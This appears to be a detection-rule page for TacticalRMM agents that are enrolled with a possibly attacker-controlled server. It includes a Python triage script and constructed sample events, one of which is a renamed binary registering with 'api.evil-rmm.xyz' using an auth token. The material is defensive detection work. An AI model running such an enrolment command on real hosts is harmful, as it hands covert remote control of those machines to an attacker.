
Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server (2db93a3f-3249-4f73-9e68-0e77a0f8ae7e)

Detects TacticalRMM agent installations where the --api, --auth, and related flags are passed on the command line. These parameters point the agent at a specific RMM server and supply the authentication token, client ID, and site ID it needs to enrol with that server. On a host where TacticalRMM is not an approved management tool, or where the server named by --api is not the organisation's own, this can indicate a threat actor silently enrolling the host into attacker-controlled RMM infrastructure.
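The following is an added example, not the Sigma rule itself nor TacticalRMM project code. It applies the detection logic described above to a few constructed process-creation records and adds the triage step a practitioner wants next: extracting the host given to --api and comparing it with an allowlist of known-good RMM servers. The allowlist host, the sample paths and the sample token values are assumptions; requiring all four of --api, --auth, --client-id and --site-id (in either -flag or --flag form, which Go's flag package accepts) is a choice made here to mirror the parameter list in the description.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (Sysmon EID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Temp\tacticalagent-v2.8.0-windows-amd64.exe",
     "CommandLine": r'"C:\Temp\tacticalagent-v2.8.0-windows-amd64.exe" -m install '
                    r'--api "https://api.rmm.example.com" --client-id 1 --site-id 1 '
                    r'--auth "0123abcd" --power'},
    {"Image": r"C:\Users\Public\svc.exe",
     "CommandLine": r'svc.exe -m install --api https://api.evil-rmm.xyz '
                    r'--client-id 7 --site-id 3 --auth deadbeef'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo hello"},
]

# Assumption: the organisation's own TacticalRMM API host(s). Anything else is suspect.
KNOWN_RMM_API_HOSTS = {"api.rmm.example.com"}

# Flags that together constitute an agent registration (from the rule description).
REGISTRATION_FLAGS = ("api", "auth", "client-id", "site-id")


def parse_flags(cmdline):
    """Return {name: value} for -flag value, --flag value and --flag=value tokens.

    Double-quoted tokens are kept whole and then unquoted, so Windows paths and
    quoted URLs survive. A flag with no following value maps to None.
    """
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    flags = {}
    i = 0
    while i < len(tokens):
        m = re.fullmatch(r"--?([A-Za-z][\w-]*)(?:=(.*))?", tokens[i])
        if m:
            name, value = m.group(1), m.group(2)
            # Consume the next token as the value unless it looks like another flag.
            if value is None and i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
                value = tokens[i + 1]
                i += 1
            flags[name] = value
        i += 1
    return flags


def detect_registration(event):
    """Return a triage record if the command line is a TacticalRMM registration, else None."""
    flags = parse_flags(event["CommandLine"])
    if not all(f in flags for f in REGISTRATION_FLAGS):
        return None
    api = flags.get("api") or ""
    host = urlparse(api).hostname or api  # tolerate a bare host with no scheme
    return {
        "image": event["Image"],
        "api_host": host,
        "known_server": host in KNOWN_RMM_API_HOSTS,
        # Heuristic added here: the stock installer carries "tacticalagent" in its name;
        # a renamed binary doing a registration deserves a closer look.
        "renamed_binary": "tacticalagent" not in event["Image"].lower(),
    }


def scan(events):
    """Run the detection over a list of events and return only the hits."""
    hits = []
    for ev in events:
        rec = detect_registration(ev)
        if rec is not None:
            rec["verdict"] = "benign-if-approved" if rec["known_server"] else "investigate"
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Of the three constructed events, the first registers with the allowlisted server and is flagged only as a known-good enrolment; the second registers a renamed binary with an unknown server and is marked for investigation; the third carries none of the registration flags and produces no hit. Legitimate MSP or internal deployments are the main source of benign matches, so the --api host comparison is where the analyst's time is saved.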

Cluster A | Galaxy A | Cluster B | Galaxy B | Level
Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server (2db93a3f-3249-4f73-9e68-0e77a0f8ae7e) | Sigma-Rules | Remote Access Tools - T1219 (4061e78c-1284-44b4-9116-73e4ac3912f7) | Attack Pattern | 1
Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server (2db93a3f-3249-4f73-9e68-0e77a0f8ae7e) | Sigma-Rules | Ingress Tool Transfer - T1105 (e6919abc-99f9-4c6c-95a5-14761e7b2add) | Attack Pattern | 1